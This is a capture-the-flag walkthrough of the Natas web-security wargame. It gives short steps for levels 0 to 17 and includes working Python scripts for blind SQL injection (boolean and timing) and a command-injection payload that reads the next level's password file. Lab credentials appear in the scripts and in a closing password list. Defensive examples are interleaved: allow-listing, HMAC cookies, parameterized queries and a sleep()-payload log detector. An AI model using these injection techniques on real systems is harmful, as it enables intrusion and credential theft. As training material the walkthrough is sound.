natas_levels
Level 0
Password is in the comments.
Level 1
Open the inspector with its keyboard shortcut and remove the oncontextmenu attribute from the body tag.
Level 2
When you view the source it shows a files/pixel.png element on the page. That implies there is a files folder in the server directory. Open the folder and view its contents.
Level 3
Open robots.txt and see the disallowed folder. Web crawlers read this file to learn which folders not to index.
Level 4
Change the Referer header by pointing the browser at a localhost proxy and editing the request in mitmproxy.
Level 5
Change the cookie the same way: localhost proxy plus mitmproxy.
Level 6
The PHP source includes the file that holds the secret word needed to reveal the password.
Level 7
Check the HTML. It has a comment stating the page that has the password. Use that as a query in the URL to view the page.
Level 8
Check the PHP source they are providing. Decode the string from hexadecimal, reverse it, and base64-decode the result.
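The decode chain above (hex, reverse, base64) as an added example that is not code from the page; the sample secret is constructed, not the level's real one. The point for a defender is that every step is reversible: this is obfuscation, not secrecy, and anyone with the source and the stored value recovers the word.

```python
import base64
import binascii

# Constructed sample secret; not the level's real secret word.
SAMPLE_SECRET = "example-secret"


def encode_secret(secret: str) -> str:
    """Forward direction of the chain: base64-encode, reverse, hex-encode."""
    b64 = base64.b64encode(secret.encode()).decode()
    return binascii.hexlify(b64[::-1].encode()).decode()


def decode_secret(encoded_hex: str) -> str:
    """Undo it: hex-decode, reverse the string, base64-decode."""
    reversed_b64 = binascii.unhexlify(encoded_hex).decode()
    return base64.b64decode(reversed_b64[::-1]).decode()


if __name__ == "__main__":
    blob = encode_secret(SAMPLE_SECRET)
    print("stored value:", blob)
    print("recovered   :", decode_secret(blob))
```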
Level 9
Comment out the query and grep the file that holds the password, since the input reaches passthru() unsanitized.
Level 10
Do the same as before. Asterisk, period and forward slash are not among the filtered characters.
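The weakness in levels 9 and 10 is that user input reaches a shell, and level 10 shows that a blacklist of a few metacharacters does not close it. Added example, not code from the page: a blacklist in the level's style beside the hardened form, which allow-lists the needle as a single word and runs grep with an argument list and no shell. The dictionary file is constructed for the demonstration.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Constructed dictionary standing in for the level's word list (assumption).
DICT_PATH = Path(tempfile.mkdtemp()) / "dictionary.txt"
DICT_PATH.write_text("africa\nafricans\napple\nbanana\n")

# Allow-list: a needle is one word of letters and digits, nothing else.
NEEDLE_RE = re.compile(r"[A-Za-z0-9]{1,64}")


class BadNeedle(ValueError):
    """Raised for input that is not a plain word."""


def blacklist_passes(needle: str) -> bool:
    """Filter in the level's style: block a few shell metacharacters.
    Anything not on the list ($, parentheses, *, ., / ...) goes through."""
    return re.search(r"[;|&]", needle) is None


def allowlist_passes(needle: str) -> bool:
    """Hardened check: accept only what a dictionary lookup needs."""
    return NEEDLE_RE.fullmatch(needle) is not None


def search_dictionary(needle: str) -> list[str]:
    """Validate, then run grep with an argv list and no shell, so there is
    nothing left to expand or substitute even if validation were weaker."""
    if not allowlist_passes(needle):
        raise BadNeedle(needle)
    proc = subprocess.run(
        ["grep", "-i", "--", needle, str(DICT_PATH)],
        capture_output=True, text=True, check=False,
    )
    return proc.stdout.splitlines()
```

Run it with "africans" and with a needle that carries a `$(...)` substitution: the blacklist accepts both, the allow-list rejects the second, and the argv form never hands either to a shell.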
Level 11
Base64-decode the data cookie. XOR it with the known plaintext to get the XOR key. Once you have the key, change the cookie value to yes, XOR it with the key, and send that as the cookie.
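Why the level 11 cookie falls: with a known plaintext, XOR of plaintext and ciphertext gives back the repeating key. Added example, not code from the page; the plaintext shape, the four-byte key and the HMAC key are all constructed. The second half shows the mitigation a defender wants here: authenticate the cookie with an HMAC under a separate server-side key, so a value built with a recovered XOR key is rejected.

```python
import hashlib
import hmac
import json
from typing import Optional

# Constructed values (assumptions): plaintext of the shape the level's cookie uses,
# and a short repeating XOR key chosen for the demonstration.
PLAINTEXT = json.dumps({"showpassword": "no", "bgcolor": "#ffffff"}).encode()
SECRET_KEY = b"qw8J"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(plaintext: bytes, ciphertext: bytes) -> bytes:
    """Known plaintext XOR ciphertext is the key stream; collapse it to its period."""
    stream = bytes(p ^ c for p, c in zip(plaintext, ciphertext))
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


# Mitigation: a MAC under a key the client never sees. Recovering SECRET_KEY
# from a known plaintext no longer lets anyone produce a cookie the server accepts.
HMAC_KEY = b"constructed-server-side-mac-key"


def seal(plaintext: bytes) -> str:
    body = xor_bytes(plaintext, SECRET_KEY)
    tag = hmac.new(HMAC_KEY, body, hashlib.sha256).hexdigest()
    return body.hex() + "." + tag


def open_sealed(cookie: str) -> Optional[bytes]:
    """Return the plaintext, or None if the tag does not verify."""
    body_hex, _, tag = cookie.partition(".")
    body = bytes.fromhex(body_hex)
    expected = hmac.new(HMAC_KEY, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return xor_bytes(body, SECRET_KEY)
```

XOR with a short repeating key is not encryption in any useful sense; the MAC is what makes the cookie tamper-evident, and the same check would be needed even with a real cipher.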
Level 12
Create a .php file that cats the password. Change the HTML so the form sends a .php file instead of a .jpg. Send it and open it in the browser.
Level 13
Add the JPEG magic bytes to the raw hexdump of the file. Then upload it.
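Levels 12 and 13 together show what an upload check has to do: level 12 trusts the client's file name, level 13 trusts magic bytes alone, and a file that starts with a JPEG signature and continues with script passes the second check. Added example, not code from the page: a validator that sniffs the type, requires the client's extension to agree with it, and then stores the file under a server-generated name whose extension comes from the sniffed type. The upload directory is constructed.

```python
import secrets
import tempfile
from pathlib import Path
from typing import Optional

# Signatures for the image types the form is meant to accept.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
UPLOAD_DIR = Path(tempfile.mkdtemp())  # constructed stand-in for the site's upload directory


class RejectedUpload(ValueError):
    pass


def sniff_type(data: bytes) -> Optional[str]:
    """Extension implied by the leading bytes, or None if no known signature."""
    for ext, magic in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def client_extension(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def store_upload(client_filename: str, data: bytes) -> Path:
    """Magic bytes are necessary but not sufficient (level 13); the stored path
    is chosen by the server and its extension comes from the sniffed type."""
    ext = sniff_type(data)
    if ext is None:
        raise RejectedUpload("content does not start with a known image signature")
    claimed = client_extension(client_filename)
    if claimed != ext:
        raise RejectedUpload(f"claimed extension {claimed!r} does not match sniffed type {ext!r}")
    dest = UPLOAD_DIR / f"{secrets.token_hex(16)}.{ext}"
    dest.write_bytes(data)
    return dest


def is_accepted(client_filename: str, data: bytes) -> bool:
    """Convenience wrapper for callers that only need the verdict."""
    try:
        store_upload(client_filename, data)
        return True
    except RejectedUpload:
        return False
```

A polyglot that starts with the JPEG signature is still stored, but as `<random>.jpg`, which the web server serves as image bytes; the remaining control is to keep script execution disabled for the upload directory so that no naming mistake can turn a stored file into code.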
Level 14
Inject into the username field so the rest of the SQL query after it is commented out.
Level 15
```python
#!/usr/bin/env python3
import requests

url = "http://natas15.natas.labs.overthewire.org"
auth_username = "natas15"
auth_password = "TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB"
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = ""
pos = 1  # length of the prefix under test (was `iter`, which shadows a builtin)
test = True
while test:
    test = False
    for i in characters:
        uri = url + "?debug=true"
        r = requests.get(
            uri,
            auth=(auth_username, auth_password),
            params={
                # Boolean oracle: the page only says whether the user exists,
                # and the SUBSTR comparison turns that into one more character.
                "username": 'natas16" and SUBSTR(password, 1, '
                + str(pos)
                + ')="'
                + password
                + i
            },
        )
        # print(r.text)
        # print("Letter", i, r.elapsed.total_seconds())
        if "exists" in r.text:
            test = True
            pos += 1
            password += i
            print("password:", password, flush=True)
print("password:", password)
```
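Levels 14 and 15 are the same bug seen twice: the username is pasted into the SQL text, so a quote ends the literal and the rest of the input becomes part of the WHERE clause. Added example, not code from the page: the level's construction beside the parameterized form, against a constructed in-memory SQLite table (the levels use MySQL; the probe below uses single quotes to match this table).

```python
import sqlite3

# Constructed in-memory table standing in for the level's users table (assumption).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
conn.execute("INSERT INTO users VALUES ('natas16', 'constructed-example-password')")
conn.commit()


def user_exists_unsafe(username: str) -> bool:
    """The level's construction: the parameter becomes part of the SQL text."""
    query = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchone() is not None


def user_exists_safe(username: str) -> bool:
    """Hardened form: the value is bound separately from the statement, so
    quotes and keywords inside it are only characters to compare against."""
    query = "SELECT 1 FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchone() is not None


# Probe of the shape the level-15 script sends, adapted to this table's quoting.
PROBE = "natas16' AND SUBSTR(password, 1, 1) = 'c"
```

With the unsafe version the answer to the probe depends on the first character of the stored password, which is the whole oracle the level-15 script drives; with the bound parameter the same string is simply a username that does not exist.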
Level 16
```python
#!/usr/bin/env python3
import requests
import string

url = "http://natas16.natas.labs.overthewire.org"
auth_username = "natas16"
auth_password = "TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V"
characters = string.ascii_letters + string.digits
# print(characters)
default_needle = "Africans"  # a word known to be in the dictionary
password_chars = ""

# Pass 1: which characters occur in the password at all?
# If grep matches, its output is appended to the needle and the dictionary
# hit for "Africans" disappears from the response.
print("chars = ", end="")
for i in characters:
    r = requests.get(
        url,
        auth=(auth_username, auth_password),
        params={
            "needle": default_needle + "$(grep " + i + " /etc/natas_webpass/natas17)"
        },
    )
    # print(r.text)
    if default_needle not in r.text:
        password_chars += i
        print(i, end="", flush=True)
print()
print("password chars = ", password_chars)

# Pass 2: grow the prefix with an anchored grep; stop once a full pass
# over the candidate characters extends nothing (the original looped forever).
password = ""
while True:
    found = False
    for i in password_chars:
        r = requests.get(
            url,
            auth=(auth_username, auth_password),
            params={
                "needle": default_needle
                + "$(grep ^"
                + password
                + i
                + " /etc/natas_webpass/natas17)"
            },
        )
        if default_needle not in r.text:
            password += i
            found = True
            print(password)
    if not found:
        break
print("password:", password)
```
A POST request can also be used for this.
Level 17
```python
#!/usr/bin/env python3
import requests

url = "http://natas17.natas.labs.overthewire.org"
auth_username = "natas17"
auth_password = "XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd"
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = ""
pos = 1  # length of the prefix under test (was `iter`, which shadows a builtin)
test = True
while test:
    test = False
    for i in characters:
        uri = url + "?debug=true"
        r = requests.get(
            uri,
            auth=(auth_username, auth_password),
            params={
                # No output differs this time, so the oracle is the delay:
                # a correct prefix makes the database sleep(6) before answering.
                "username": 'natas18" and IF(SUBSTR(password, 1, '
                + str(pos)
                + ')="'
                + password
                + i
                + '", sleep(6), FALSE) and username = "natas18'
            },
        )
        # print(r.text)
        print("Letter", i, r.elapsed.total_seconds())
        if r.elapsed.total_seconds() > 6:
            test = True
            pos += 1
            password += i
            print("password:", password, flush=True)
print("password:", password)
```
Basically a timing attack: the response content never changes, only how long it takes.
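From the server side the level-17 technique has a distinctive shape: one client sends a long run of requests that differ only in their query string, a handful of which take about as long as the injected sleep, and the decoded query carries a sleep() call. Added example, not code from the page: a small detector run over constructed access-log lines. The log format (client, timestamp, request line, status, duration in milliseconds) and the sample lines are assumptions made for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log format (assumption): client, timestamp, request line, status, duration in ms.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<ms>\d+)$'
)
SLOW_MS = 5000  # a correct guess makes the database sleep(6) before answering
SIGNATURE_RE = re.compile(r"\bsleep\s*\(", re.IGNORECASE)

# Constructed sample: 10.0.0.5 runs the blind extraction; 10.0.0.9 is an ordinary
# user whose second request happens to be slow for an unrelated reason.
SAMPLE_LOG = """\
10.0.0.9 [2024-01-01T10:00:00Z] "GET /?username=bob HTTP/1.1" 200 12
10.0.0.5 [2024-01-01T10:00:01Z] "GET /?debug=true&username=natas18%22+and+IF%28SUBSTR%28password%2C+1%2C+1%29%3D%22a%22%2C+sleep%286%29%2C+FALSE%29+and+username+%3D+%22natas18 HTTP/1.1" 200 14
10.0.0.5 [2024-01-01T10:00:02Z] "GET /?debug=true&username=natas18%22+and+IF%28SUBSTR%28password%2C+1%2C+1%29%3D%22b%22%2C+sleep%286%29%2C+FALSE%29+and+username+%3D+%22natas18 HTTP/1.1" 200 13
10.0.0.5 [2024-01-01T10:00:03Z] "GET /?debug=true&username=natas18%22+and+IF%28SUBSTR%28password%2C+1%2C+1%29%3D%22c%22%2C+sleep%286%29%2C+FALSE%29+and+username+%3D+%22natas18 HTTP/1.1" 200 6011
10.0.0.9 [2024-01-01T10:00:09Z] "GET /?username=bob HTTP/1.1" 200 5120
"""


def parse_log(lines):
    """Yield one dict per well-formed line, with the path URL-decoded."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ms"] = int(rec["ms"])
            rec["decoded_path"] = unquote_plus(rec["path"])
            yield rec


def profile_clients(lines):
    """Per client: request count, slow count, signature hits, distinct query strings."""
    per_client = defaultdict(lambda: {"requests": 0, "slow": 0, "signature": 0, "queries": set()})
    for rec in parse_log(lines):
        s = per_client[rec["ip"]]
        s["requests"] += 1
        s["queries"].add(rec["decoded_path"])
        if rec["ms"] >= SLOW_MS:
            s["slow"] += 1
        if SIGNATURE_RE.search(rec["decoded_path"]):
            s["signature"] += 1
    return per_client


def suspicious_clients(lines, min_requests=3):
    """Map client -> reasons. Two independent signals: a payload signature, and the
    behavioural pattern (all-distinct queries with at least one at the sleep threshold)."""
    findings = {}
    for ip, s in profile_clients(lines).items():
        reasons = []
        if s["signature"]:
            reasons.append(f"{s['signature']} request(s) carry a sleep() payload")
        if s["requests"] >= min_requests and s["slow"] and len(s["queries"]) == s["requests"]:
            reasons.append("a run of distinct query strings with at least one at the sleep threshold")
        if reasons:
            findings[ip] = reasons
    return findings
```

The behavioural rule matters because the signature alone is easy to miss once the payload is encoded differently; a single slow request from an ordinary user, as in the last sample line, does not trip either rule on its own.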
- natas 8: a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB
- natas 11: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg
- natas 12: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG
- natas 14: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP
- natas 16: TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
- natas 18: 8nEduUXg8kFGPV84uLWvzKgn6oKjq6aq